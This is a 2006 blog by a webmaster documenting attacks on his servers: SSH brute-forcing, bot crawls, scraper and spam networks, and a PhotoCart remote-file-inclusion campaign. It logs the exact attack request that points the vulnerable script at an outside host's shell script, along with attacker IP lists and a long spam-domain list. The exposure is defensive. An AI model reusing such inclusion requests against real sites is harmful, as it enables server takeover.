Saturday, December 16, 2006

Compromised Within My Own Data Center

Today was interesting as I noticed a couple of servers within my own data center taking aim at my servers. One IP address was attempting a bazillion user names and passwords on SSH and the other IP address was scanning pages on the web server. Now scanning pages on the web server isn't such a big deal, but when I went to look at the server and see who they were, it attempted to inject a virus into my computer using a browser vulnerability.

Just finished reporting both incidents to the support staff at the hosting company and we'll wait and see how they respond. If they leave the virus injecting server online I will probably have to take my business elsewhere as that's just not cool, and of course everyone will find out who they are and what they said at that point.

Now we wait...

Friday, December 15, 2006

New Crawling From EV1Servers

No clue what this is or who it's related to yet, but it's definitely a bot of some sort doing a crawl distributed over a d-block at EV1. Since it was from their data center it was already blocked and fed breadcrumb pages to see where the data shows up, if ever.

Here's the alarm it set off...

PROXIMITY ALERT!
209.85.54. [ev1s-209-85-54-130.ev1servers.net.]

209.85.54.130 pages 6- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.132 pages 4- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.134 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.135 pages 5- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.137 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.138 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.139 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.140 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.143 pages 1- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.146 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Now we just sit back and wait and watch to see where this info pops up as it could always be just a data mining operation which never shows up in the index.

Thursday, December 14, 2006

Next Wave PhotoCart Attack With New Domain

These assholes just don't stop trying this PhotoCart vulnerability, it's quite idiotic since it didn't work the last few thousand times they hit my site.

They have a new domain:

http://www.wnydir.com/c.in
Which currently proclaims:
Bandwidth Limit Exceeded The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.
Keep an eye on it, probably will be back up later or tomorrow, who knows.

These botnet guys obviously aren't the smartest tacks on the cork board picking a domain with throttled bandwidth to work from, but it's probably a hacked site and now that poor customer has no clue he's offline due to vandalism.

Here's the list of attackers so far today:
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 86 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 45 pages as "libwww-perl/5.65"
66.254.98.142 [angels.reflected.net.] requested 39 pages as "libwww-perl/5.803"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 42 pages as "libwww-perl/5.801"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 41 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 43 pages as "libwww-perl/5.801"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 27 pages as "libwww-perl/5.805"
85.214.19.18 [copyworld-kiel.de.] requested 53 pages as "libwww-perl/5.69"
195.242.211.253 [faq.ecobike.de.] requested 17 pages as "libwww-perl/5.48"
67.159.26.99 [.] requested 2 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 41 pages as "libwww-perl/5.805"
203.194.134.166 [unknown] requested 37 pages as "libwww-perl/5.65"
66.103.152.111 [server22.internet-hosting-services.com.] requested 50 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 38 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 65 pages as "libwww-perl/5.801"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 42 pages as "libwww-perl/5.803"
203.146.140.221 [besthost5.com.] requested 29 pages as "libwww-perl/5.64"
207.158.61.3 [ns1.control8.com.] requested 45 pages as "libwww-perl/5.79"
81.169.186.195 [moncserver.de.] requested 52 pages as "libwww-perl/5.803"
203.167.88.76 [unknown] requested 29 pages as "libwww-perl/5.65"
62.221.213.68 [unknown] requested 14 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 28 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 19 pages as "libwww-perl/5.803"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 14 pages as "libwww-perl/5.803"
I wonder what compromised site they'll be using tomorrow?

Spam Kiting?

Someone I know just wrote an article about domain kiting and how he used to get domains for 5 days for free as long as you canceled them within 5 days. This triggered a memory as I remember writing about some spammers that were trying to bombard me with links to domains that didn't even exist yet, not registered to be exact. Then the domains became active suddenly to reap the rewards ot the previous blog spamming and most of them tended to vanish within a few days.

With all of this information inside my head it collided and bubba had a thought...

SPAM KITING!

Makes perfect sense too since many spammer domains get whacked in a couple of days as people complain to the web host.

So why not just use a domain for 5 days for free and cancel it?

You get rewarded for spamming for a bunch of domains you got completely for FREE and you don't get stuck holding the bag with a bunch of useless blacklisted domains most likely in a Google penalty box at that point.

Now a truly evil genius [looks in mirror] would write a script that checks to see if the domains in the attempted spams are registered and register them if they don't exist, then cancel them all 5 days later automatically. That way, the site being abused by the spam could take advantage of the spammers efforts and there is no connection between the spammer and the domain name except the existence of the spam linking to the domain.

I need to check my logs and see if the idiots that used to spam me with unregistered domains are still hard at work as I see some fun to be had!

Another Made For AdSense Scraper Linked to Umax Link Spammer

Another one of the Made For AdSense sites got caught in my snare and sure enough this one also was tied to a huge list of MFA sites and some porn spam sites as well.

Check this out:

http://www.digitbytes.com/
Did a little more research on the source of this scraping:
IP Address: 66.199.247.42
User Agent: lwp-trivial/1.41
It sounded familiar and sure enough it's the same IP address from a previous scraper I wrote about from umax-ppc.net (66.199.247.42) that previously had some virus injection stuff on their server, but I didn't check this time so beware.

Same IP as before, same user agent, still operating from the same location where they were previously hosting sites that injected a virus. It's simply amazing that this stuff is allowed to continue to operate within US data centers, or any data centers for that matter, as it's obvious the hosting companies are more concerned about their bottom line than their reputations or these guys wouldn't have a host.

I used this cool tool to get a list of all the link spam domains currently hosted on that server and it's a staggering list.
Found 730 websites with the IP 66.199.247.42

1) 1.top-10-shop.com
2) 1.yula.name
3) 100-inch.lcd.tv.1day.us
4) 12yo.umax-search.info
5) 1day.us
6) 2005.freeyaho.com
7) 2006.adsname.com
8) 2006.baikal-info.com
9) 2006.dimattic.com
10) 2006.freeyaho.com
11) 2006.hotel-baikal.info
12) 2006.online-info.info
13) 2006.you.freeyaho.com
14) 3.top-10-shop.com
15) 66.199.247.42
16) 8.freeyaho.com
17) a.adsname.com
18) a.freeyaho.com
19) abc-news.free-hit.com
20) academy-award-nominees.ppc-se.net
21) academy-awards.adsname.com
22) acoustic-guitar.1day.us
23) adawere.seblog.name
24) administration.specific911.biz
25) adoption.seblog.name
26) adsname.com
27) adult-gaming.umaxsearch-se.com
28) adultcheck.seblog.name
29) affiliate-books.com
30) air-compressor.seblog.name
31) alberta.ppc-se.com
32) alfred.top-10-shop.com
33) almond-trees.specific911.biz
34) american-immigration.keywords-blog.com
35) analysis.umax-search.info
36) and.1day.name
37) and.dimattic.com
38) and.freeyaho.com
39) and.online-info.info
40) and.rates.the.2006.1day.name
41) and.sampleclip.net
42) and.suggestions.and.real.the.2006.1day.name
43) and.umaxppc.com
44) and.umaxppcsearch.com
45) and.umaxse.net
46) and.webmasterdiscuss.com
47) angels.seblog.name
48) animals.seblog.name
49) anniversary-presents.seblog.name
50) anti-war.online-info.info
51) antiques.seblog.name
52) appraisal.ppc-se.net
53) architecture-record.seblog.name
54) army-tshirts.seblog.name
55) aroma.seblog.name
56) arshan.info
57) art-software.seblog.name
58) art-xxx.com
59) as-seen-on-tv.seblog.name
60) at.the.porn-teen-pic.com
61) auction.seblog.name
62) aussenputz.hockey.seblog.us
63) automotive-information-center.seblog.name
64) babe.seblog.name
65) baby-stroller.top-new-affiliate-programs.com
66) back-pack.seblog.name
67) baikal-hotel.com
68) baikal-info.com
69) baikal-shop.com
70) baikalguide.com
71) baikalsk.com
72) baikalsk.info
73) baikalsk.net
74) bankrupcy.seblog.name
75) baseball-betting-line.seblog.name
76) beach-cruisers.seblog.name
77) beach.top-10-shop.com
78) beaches.weekly-teens.com
79) bermuda-travel.seblog.name
80) best.freeyaho.com
81) best.ppc-se.net
82) best.top-10-shop.com
83) bet-and-win.seblog.name
84) beta-news.board-online.com
85) bicycle-catalog.seblog.name
86) bicycle-classified.seblog.name
87) bicycle-rating.seblog.name
88) bicycle-ratings.seblog.name
89) bicycle-safety.seblog.name
90) bicycle-sizing.seblog.name
91) bifocal-lens.seblog.name
92) bike-helmets.seblog.name
93) bike-sales.seblog.name
94) bikes-cruisers.seblog.name
95) bikini.seblog.name
96) bioresearch.online-info.info
97) blank-cdr-media.seblog.name
98) blog.freeyaho.com
99) blog.hotel-baikal.info
100) blog.porno-sample.com
101) blog.se.ppc-se.com
102) blog.umax-ppc.net
103) blog.umaxppc.net
104) blog.webmasterdiscuss.com
105) blue-dragon.board-online.com
106) blues.seblog.name
107) bmx-bicycle.seblog.name
108) board-online.com
109) boards-ppc-se.adsname.com
110) body-lotion.ads-affiliate-programs.com
111) boehm.seblog.name
112) booky.umaxppc.net
113) borrowing-money.seblog.name
114) british-columbia.ppc-se.com
115) bush-watch.seblog.name
116) business-administration-college.seblog.name
117) business-card-organizer.seblog.name
118) business.top-10-shop.com
119) but.freeyaho.com
120) but.seohuntress.com
121) buy-car.seblog.name
122) buy-diazepam.seblog.name
123) buy.freeyaho.com
124) buying-a-camera.seblog.name
125) cad-drafting.umaxsearch-se.com
126) calculator.seblog.name
127) canada-food-guide.seblog.name
128) canada.seblog.name
129) candy-stores.seblog.name
130) cannon-digital-camcorders.seblog.name
131) canon-g.seblog.name
132) cape-canaveral.board-online.com
133) car-buying-advice.seblog.name
134) carpenters.seblog.name
135) cash-advance-top.com
136) casio-watchband.seblog.name
137) casting.seblog.name
138) casual-clothes.top-new-affiliate-programs.com
139) casual.gamers.online-info.info
140) catalog.adsname.com
141) cd-interest-rate.seblog.name
142) cd-music.seblog.name
143) cd-replication.seblog.name
144) cello-lessons.internet-marketing-online.us
145) certificates.seblog.name
146) chapter.seblog.name
147) cheap-calls.seblog.name
148) cheap-computers.seblog.name
149) cheap.freeyaho.com
150) cheapest-gas.seblog.name
151) chemical-suppliers.seblog.name
152) chicago-bears-tickets.seblog.name
153) chicago.seblog.name
154) chicago.webmasterdiscuss.com
155) child.pornography.images.porno-sample.com
156) chimes.seblog.name
157) chocolate-fondue.seblog.name
158) christmas-crackers.seblog.name
159) christmas-decorations.seblog.name
160) chronometer.seblog.name
161) cinema.seblog.name
162) club.seblog.name
163) cme-courses.board-online.com
164) cobb-county-school.seblog.name
165) cocoa.dimattic.com
166) colloidal.seblog.name
167) columbia.seblog.name
168) commodity-charts.seblog.name
169) community.freeyaho.com
170) computer-cart.seblog.name
171) computers.seblog.name
172) conga.seblog.name
173) contractors.seblog.name
174) converting.seblog.name
175) cosmetic-contacts.webmaster-online.net
176) court-tv-message-boards.seblog.name
177) craft.seblog.name
178) credit-repair.seblog.name
179) critical.board-online.com
180) cruisers.seblog.name
181) csi.seblog.name
182) cufflinks.seblog.name
183) custom-mailbox.seblog.name
184) data-entry.seblog.name
185) data.seblog.name
186) day-camp.seblog.name
187) debt-to-income-ratio.seblog.name
188) decorative-bird-house.seblog.name
189) delaware.freeyaho.com
190) deltagard.top-10-shop.com
191) description.sehuntress.biz
192) desk.seblog.name
193) dessert.seblog.name
194) digital-world-insider.board-online.com
195) dildos.seblog.name
196) dimattic.com
197) dining-set.seblog.name
198) diploma.seblog.name
199) discount-cigarettes.umax-search.biz
200) discount-golf-clubs.seblog.name
201) discovers.computer-screen.ppc-se.info
202) disneyland-ticket.seblog.name
203) distributor-network.seblog.name
204) domain.freeyaho.com
205) domains-affiliate-programs.com
206) down-blouse-picture.seblog.us
207) drama.seblog.name
208) dremel-tool.seblog.name
209) drugs.seblog.name
210) dsdomain.com
211) dsl-available-area.webmaster-online.net
212) dsl-maryland.seblog.name
213) dvd-decoder.seblog.name
214) earth.systems.board-online.com
215) educators.top-10-shop.com
216) electronic-forms.seblog.name
217) electronic-passports.porno-sample.com
218) emergency.seblog.name
219) epson-pos-printer-ribbon.seblog.name
220) epson-products.seblog.name
221) esq-venture.seblog.name
222) eurail.seblog.name
223) eye-exercise.nude-teacher.com
224) faucets.seblog.name
225) ferret-cages.seblog.name
226) ferret.seblog.name
227) film-scanners.1day.us
228) fine-furniture.dsdomain.com
229) fioricet-online.seblog.name
230) firearms-law.seblog.name
231) first.freeyaho.com
232) fishing-industry.seblog.name
233) fitness-training.seblog.name
234) five.sehuntress.com
235) flags.umax-search-search-engine.com
236) flasks.seblog.name
237) flex.dimattic.com
238) flex.seblog.name
239) flexographic.seblog.name
240) florida-long-distance-providers.seblog.name
241) florist-uk.seblog.name
242) fluorescent-ballast.seblog.name
243) flute-lessons.seblog.name
244) foam.seblog.name
245) football.seblog.name
246) ford.seblog.name
247) form.adsname.com
248) form.freeyaho.com
249) form.news.umaxse.net
250) form.umaxppc.net
251) form.umaxse.net
252) form.umaxse.org
253) forum-online.biz
254) forum.adsname.com
255) france-flag.seblog.name
256) fraud.top-10-shop.com
257) free-hit.com
258) free-order.adsname.com
259) free.adsname.com
260) free.freeyaho.com
261) freebies.adsname.com
262) freebies.baikalsk.net
263) freebies.freeyaho.com
264) freebies.seohuntress.com
265) freebies.umaxppc.net
266) freestyle-bikes.seblog.name
267) freeyaho.com
268) french-chocolates.seblog.name
269) full-suspension-bike.seblog.name
270) futons.seblog.name
271) futures-broker.seblog.name
272) futures-charts.top-10-shop.com
273) g-string.seblog.name
274) gambling-rule.seblog.name
275) game-publisher.top-10-shop.com
276) gay-sex.baikalsk.com
277) general.yula.us
278) german-chocolate.seblog.name
279) glass-guard.seblog.name
280) global-positioning-system.ppc-se.com
281) google-ceo.board-online.com
282) google.adsense.ppc-se.com
283) google.top-10-shop.com
284) googlepray.adsname.com
285) gospel.hockey.seblog.us
286) graber.seblog.name
287) grip.seblog.name
288) guess.seblog.name
289) guestbook.adsname.com
290) guestbook.freeyaho.com
291) guestbook.umaxse.info
292) guestbook.umaxse.net
293) guylian.seblog.name
294) hair-style-photo.seblog.name
295) hairs.seblog.name
296) hardcore-fucking.seblog.name
297) health.top-10-shop.com
298) healthcare.seblog.name
299) healthy-appetizers.seblog.name
300) helmet-sale.dsdomain.com
301) helmet.seblog.name
302) herbal-breast-enhancement.seblog.name
303) hi-fi-audio.seblog.name
304) history-of-chocolate-cake.seblog.name
305) hockey-statistics.seblog.name
306) hockey.seblog.us
307) home-building-plans.seblog.name
308) home-decoration.seblog.name
309) home-repair-help.seblog.name
310) home.adsname.com
311) homedrugtest.seblog.name
312) horoscopes.seblog.name
313) hot-jobs-online.com
314) hotel-baikal.com
315) hotel-baikal.info
316) hotel-shop.info
317) hotel.freeyaho.com
318) house-plants.seblog.name
319) houseware.seblog.name
320) how-to-lose-weight.seblog.name
321) hp-ink.dimattic.com
322) hp.seblog.name
323) humidor.seblog.name
324) hybrids.seblog.name
325) i-love-lucy.dimattic.com
326) i-love-you-gifts.umax-search-search-engine.com
327) iguana-cages.seblog.name
328) imported-candy.umax-search.biz
329) impotent.seblog.name
330) inc.seblog.name
331) incorporate-in-new-jersey.seblog.name
332) independent-book-publishers.seblog.name
333) independent-contractor.seblog.name
334) individual-investor-magazine.seblog.name
335) industrial-adhesives.seblog.name
336) industrial-valves.seblog.name
337) info.seblog.name
338) information-broker.seblog.name
339) insect-repellants.porno-sample.com
340) intel.seblog.name
341) internet-marketing-online.us
342) internet-marketing.adsname.com
343) internet.baikal-info.com
344) internet.freeyaho.com
345) interracial.seblog.name
346) investing.seblog.name
347) islander-on-the-beach.seblog.name
348) jaguar-xj.seblog.name
349) jensen-headphones.seblog.name
350) job-opening.seblog.name
351) john-hopkins-medical-center.seblog.name
352) jumpsuits.seblog.name
353) jvc-camcorder-vhsc.seblog.name
354) keynote.seblog.name
355) keyword.qoclick.net
356) keywords-blog.com
357) keywords.freeyaho.com
358) kids-game.seblog.name
359) kilts.seblog.name
360) kiss.seblog.name
361) kodak.seblog.name
362) lake-baikal.info
363) lamp-and-shade.seblog.name
364) las-cruces-sun-news.seblog.name
365) last.top-10-shop.com
366) latest.freeyaho.com
367) latest.ppc-se.com
368) latina.seblog.name
369) learning-computer.umax-search-search-engine.com
370) lease.seblog.name
371) leather-brief-case.seblog.name
372) leather-briefcase.seblog.name
373) lesson.top-10-shop.com
374) lexmark--driver.seblog.name
375) lexmark.specific911.org
376) library-project.tricks.name
377) light-bulb.seblog.name
378) lighting-design.seblog.name
379) lightwave.seblog.name
380) literature.yula.us
381) lithography.seblog.name
382) litter.seblog.name
383) local-telephone-service.seblog.name
384) logo.top-10-shop.com
385) lonestar.seblog.name
386) loop.seblog.name
387) low-intrest-credit-card.seblog.name
388) lowermybills.com.webmasterdiscuss.com
389) macanudo.seblog.name
390) magic.seblog.name
391) magnet.seblog.name
392) major-vulnerability.porno-sample.com
393) managed-futures.seblog.name
394) map-guide.freeyaho.com
395) maps.seblog.name
396) marketing-organization.seblog.name
397) martial-arts-information.seblog.name
398) maryland-local-phone-service.seblog.name
399) may.umax-search.info
400) mechanical-tubing.seblog.name
401) medical-advise.seblog.name
402) medical-references.seblog.name
403) medical-sites.seblog.name
404) medical-symbols.seblog.name
405) men-bracelet.seblog.name
406) mens-dress-watches.seblog.name
407) meta-tags.blog.ppc-se.com
408) mexico-newspaper.seblog.name
409) miami-tv.sampleclip.net
410) milk-chocolate.seblog.name
411) mlb.seblog.name
412) mobile-computing.board-online.com
413) modern-chairs.seblog.name
414) moonstruck-chocolatier.seblog.name
415) most.adsname.com
416) most.freeyaho.com
417) most.woodworking.real.the.2006.1day.name
418) mothers.seblog.us
419) movado.seblog.name
420) msn-search.blog.ppc-se.com
421) multifunction-printers.seblog.name
422) nada-used-car-guide.seblog.name
423) natural-pest-control.seblog.name
424) natural-skin-care.seblog.name
425) ncaa-sports.seblog.name
426) network-traffic-analysis.seblog.name
427) new-car.seblog.name
428) news-analysis.board-online.com
429) news.blog-se.ppc-se.info
430) news.top-10-shop.com
431) news.umaxse.net
432) news.woods-hole-researcher.ppc-se.info
433) nfl-football-picks.seblog.name
434) nfl-stats.seblog.name
435) nhl-picks.seblog.name
436) nintendo.co.ltd.board-online.com
437) nintendo.latest-console.board-online.com
438) nokia-phones.baikal-shop.com
439) noni.seblog.name
440) nude-teacher.com
441) numerous.umax-search.info
442) nursing-home-malpractice.seblog.name
443) nut-tree.seblog.name
444) october.window.tricks.name
445) odds-makers.seblog.name
446) odds.seblog.name
447) off-track-betting.seblog.name
448) ohio-attorney.seblog.name
449) online-info.info
450) online-jewelry.seblog.name
451) online-jukebox.seblog.name
452) online-pharmacy.seblog.name
453) online.freeyaho.com
454) online.online-info.info
455) or.adsname.com
456) or.freeyaho.com
457) or.online-info.info
458) oscar.seblog.name
459) osteo-arthritis.seblog.name
460) out-google.blog.ppc-se.com
461) overthrow-apple-computer.ppc-se.com
462) pa.online-info.info
463) packages.freeyaho.com
464) pads.seblog.name
465) pallet-jack.seblog.name
466) pallet.seblog.name
467) panasonic-product.seblog.name
468) paper-weights.seblog.name
469) parenting.seblog.name
470) pc-game.baikalsk.net
471) pecan-praline.seblog.name
472) penile-erection.seblog.name
473) pentax-zxm.seblog.name
474) personal-finances.seblog.name
475) pet-monkey.seblog.name
476) pet-tags.seblog.name
477) photo-exhibition.seblog.name
478) photographic-paper.seblog.name
479) php.yula.ws
480) pink.seblog.name
481) pittsburgh-newspaper.seblog.name
482) placemat.seblog.name
483) plants.seblog.name
484) playing-cards.seblog.name
485) playstation-3.board-online.com
486) playstation-3.top-10-shop.com
487) plea-bargain.seblog.name
488) plus.sehuntress.com
489) polar-fleece-jackets.seblog.name
490) polaroid-camera.seblog.name
491) polo.seblog.name
492) pop.seblog.name
493) popcorn-machine.seblog.name
494) popular.dimattic.com
495) popular.freeyaho.com
496) porn-teen-pic.com
497) porno-sample.com
498) portable-scooter.seblog.name
499) powerball-lottery.seblog.name
500) ppc-se-provides.top-new-affiliate-programs.com
501) ppc-se.biz
502) ppc-se.com
503) ppc-se.net
504) ppc-se.top.and.reef.adscom.us
505) ppc.adsname.com
506) ppc.freeyaho.com
507) premium-content.top-10-shop.com
508) prescription.seblog.name
509) price.baikal-shop.com
510) print-on-demand.seblog.name
511) print.seblog.name
512) printing-methods.seblog.name
513) producing.porno-sample.com
514) program-directory.adsname.com
515) publications.seblog.name
516) publishing-mergers.seblog.name
517) qoclick-se.adsname.com
518) qoclick.net
519) questions.freeyaho.com
520) questions.specific911.info
521) questions.umax.org
522) questions.umaxppc.net
523) questions.we.freeyaho.com
524) questions.yula.us
525) quick-money.seblog.name
526) rack-case.seblog.name
527) rack.seblog.name
528) radio-blog-club.seblog.name
529) radio-station.seblog.name
530) raliegh-bicycles.seblog.name
531) ralph-lauren-eyewear.seblog.name
532) rates.the.2006.1day.name
533) ray-ban.seblog.name
534) reber.seblog.name
535) register.freeyaho.com
536) replacement-china.seblog.name
537) reseller-porn.com
538) robert.m.carey.porno-sample.com
539) roller-conveyors.seblog.name
540) rose.work-at-home-online.info
541) saab-part.seblog.name
542) safety-glasses.seblog.name
543) same.freeyaho.com
544) sampleclip.net
545) samsung-camcorder.seblog.name
546) samsung.seblog.name
547) santana.seblog.name
548) sapphire-earrings.seblog.name
549) scale.seblog.name
550) scanner.seblog.name
551) school.seblog.name
552) school.top-10-shop.com
553) sconce.seblog.name
554) script.php.baikal-guide.com
555) se-blog.ppc-se.com
556) se.blog.ppc-se.com
557) seblog.name
558) security-vulnerability.specific911.info
559) sehuntress.com
560) sehuntress.info
561) sehuntress.net
562) self-help-videos.seblog.name
563) seohuntress.com
564) sfi.seblog.name
565) shipping-information.seblog.name
566) shopping-services.seblog.name
567) shopping.baikal-shop.com
568) showavailable.com
569) side.specific911.info
570) siemens.seblog.name
571) simple-gifts.seblog.name
572) single-latin-woman.seblog.name
573) site-diagnostics.adsname.com
574) site.adsname.com
575) slager-radio.seblog.name
576) smith.seblog.name
577) so.adsname.com
578) soccer.seblog.name
579) software-giant.blog.ppc-se.com
580) software-products.board-online.com
581) solar-observatories.board-online.com
582) solar.terrestrial.relations.observatory.board-online.com
583) sony-digital-tv.seblog.name
584) sony-dvd-players.sampleclip.net
585) sony-mavica.seblog.name
586) soul.seblog.name
587) spa.seblog.name
588) spacecraft.board-online.com
589) specialty-envelopes.seblog.name
590) specialty-printers.seblog.name
591) specific.adsname.com
592) specific.dimattic.com
593) specific.freeyaho.com
594) specific.reseller-porn.com
595) specific.sampleclip.net
596) specific.top-10-shop.com
597) specific911.biz
598) specific911.info
599) specific911.org
600) specific911.umax-search.info
601) speed-up-internet.seblog.name
602) spells.seblog.name
603) spoon.seblog.name
604) spreadsheet-help.seblog.name
605) standard-bikes.seblog.name
606) star-printer.seblog.name
607) stemware.seblog.name
608) stickers.seblog.name
609) suggestions.adsname.com
610) suggestions.umax-search.info
611) suggestions.umax.org
612) suggestions.umaxse.org
613) suit.seblog.name
614) sunburn.seblog.name
615) sunglases.seblog.name
616) sweepstakes.seblog.name
617) tables.seblog.name
618) tanning-products.seblog.name
619) tax-filing.umax-se.biz
620) tax-rates.seblog.name
621) technologies.seblog.name
622) teen-sex.seblog.name
623) teens.seblog.name
624) telecommunication.seblog.name
625) tennessee.seblog.name
626) tent.top-10-shop.com
627) the-bad.blog.ppc-se.com
628) the-bottom.blog.ppc-se.com
629) the-good.blog.ppc-se.com
630) the.adsname.com
631) the.freeyaho.com
632) the.hotel-baikal.info
633) the.lake-baikal.info
634) the.online-info.info
635) the.porn-teen-pic.com
636) thesaurus.yula.us
637) tips.sehuntress.com
638) titanic.seblog.name
639) titanium.seblog.name
640) tokyo-game-show-2006.board-online.com
641) tommy-hilfiger.seblog.name
642) top-10-shop.com
643) toshiba-copiers.seblog.name
644) tour.seblog.name
645) towel.seblog.name
646) tracking.seblog.name
647) trade-show-display.seblog.name
648) traffic-information.seblog.name
649) training.seblog.name
650) transformers.seblog.name
651) travel-gear.sehuntress.net
652) truffles.seblog.name
653) tube.seblog.name
654) tv-videos.ppc-se.info
655) ultima.seblog.name
656) ultra-mobile.board-online.com
657) umax-ppc.net
658) umax-se.biz
659) umax-se.org
660) umax-search-ppc-se-board.com
661) umax-search-ppc.com
662) umax-search-search-engine.com
663) umax-search.biz
664) umax-search.info
665) umax.org
666) umaxppc.com
667) umaxppc.net
668) umaxppcsearch.com
669) umaxse.biz
670) umaxse.info
671) umaxse.net
672) umaxse.org
673) umaxsearch-ppc-se.com
674) umaxsearch-ppc.com
675) umaxsearch-se.com
676) unique-gift-ideas.seblog.name
677) university.freeyaho.com
678) unusual-clocks.seblog.name
679) usa.freeyaho.com
680) utilities.seblog.name
681) va.top-10-shop.com
682) valium-buy.1day.name
683) vermont-college.seblog.name
684) victorian.seblog.name
685) vintage-eyewear.seblog.name
686) virgin-sexy.com
687) virtual.freeyaho.com
688) virtual.ppc-se.net
689) virtual.seohuntress.com
690) virtual.specific911.info
691) virtual.umax.org
692) we.freeyaho.com
693) weather.sehuntress.com
694) web-design.seblog.name
695) web-statistic.seblog.name
696) web.gambling-laws.affiliate-books.com
697) webmasterdiscuss.com
698) weekly-pay-ppc-se.com
699) weekly-teens.com
700) western-new-england-college.seblog.name
701) white-boards.seblog.name
702) widely.gambling-laws.affiliate-books.com
703) windchimes.seblog.name
704) window.tricks.name
705) wine-of-the-month.seblog.name
706) winery.seblog.name
707) witch.seblog.name
708) wood-blinds.webmasterdiscuss.com
709) wooden-clocks.seblog.name
710) wooden-shelves.seblog.name
711) work-at-home-top.com
712) work-from-home-message-boards.seblog.name
713) work.top-10-shop.com
714) workforce-management.seblog.name
715) workstation.seblog.name
716) world.adsname.com
717) world.freeyaho.com
718) writing-marketing-plan.seblog.name
719) xbox-360.board-online.com
720) xerox-printer-cartridges.seblog.name
721) yahoo-message-boards.seblog.name
722) you.freeyaho.com
723) you.gambling-laws.affiliate-books.com
724) you.valium-buy.1day.name
725) your.freeyaho.com
726) your.umax-search.info
727) yula.name
728) yula.us
729) yula.ws
730) zune.board-online.com
Just pick a random domain name out of the list and see how much spam you can find in the search engines all related to this single domain. This group does it all from guestbook spam to membership profile spam, it's a one stop spam shop.

Note that the purpose of most of these domains is to redirect you to a free parked page on FREEYAHO which appears to be where they make their money.

What a twisted web of MFA, spam and domain parks they've woven.

Wednesday, December 13, 2006

Escalating PhotoCart Vulnerability Attack

I thought this silly little phase had passed and these morons had given up since there were only a few attempts after my last post. Sadly, that wasn't the case and when I got up this morning and checked the site stats I found they mounted an even bigger attack than before.

This is all good, just keep coming at my site and exposing the size of your network, because you're just proving Forest Gump's mother correct as "Stupid is as stupid does."

Here's the path they desperately want, which doesn't exist on my server:

GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in?

[UPDATE: It appears panoplanet.com has been taken down within the last couple of hours so you can't see the script anymore. Here are some links to show they were attacking others for a variety of things.]

Note that this is the script they are attempting to inject, which appears to give them shell access from a casual glance of the code.


Here's all the sites involved in today's attack:

70.86.151.130 [82.97.5646.static.theplanet.com.] requested 49 pages as "libwww-perl/5.65"
72.29.74.43 [deso.surpasshosting.com.] requested 53 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 84 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.29.83.98 [jet33.hasweb.com.] requested 54 pages as "libwww-perl/5.805"
216.227.220.4 [xena.lunarpages.com.] requested 92 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
204.157.36.20 [unknown20.36.157.204.defenderhosting.com.] requested 56 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 75 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 75 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 32 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 62 pages as "libwww-perl/5.803"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 64 pages as "libwww-perl/5.805"
205.234.100.65 [unknown65.100.234.205.defenderhosting.com.] requested 64 pages as "libwww-perl/5.805"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
66.103.152.111 [server22.internet-hosting-services.com.] requested 55 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 72 pages as "libwww-perl/5.805"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
69.10.142.59 [unknown.rackforce.com.] requested 108 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 83 pages as "libwww-perl/5.801"
67.159.26.99 [.] requested 60 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 70 pages as "libwww-perl/5.801"
203.194.134.166 [unknown] requested 22 pages as "libwww-perl/5.65"
81.169.186.195 [unknown] requested 33 pages as "libwww-perl/5.803"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
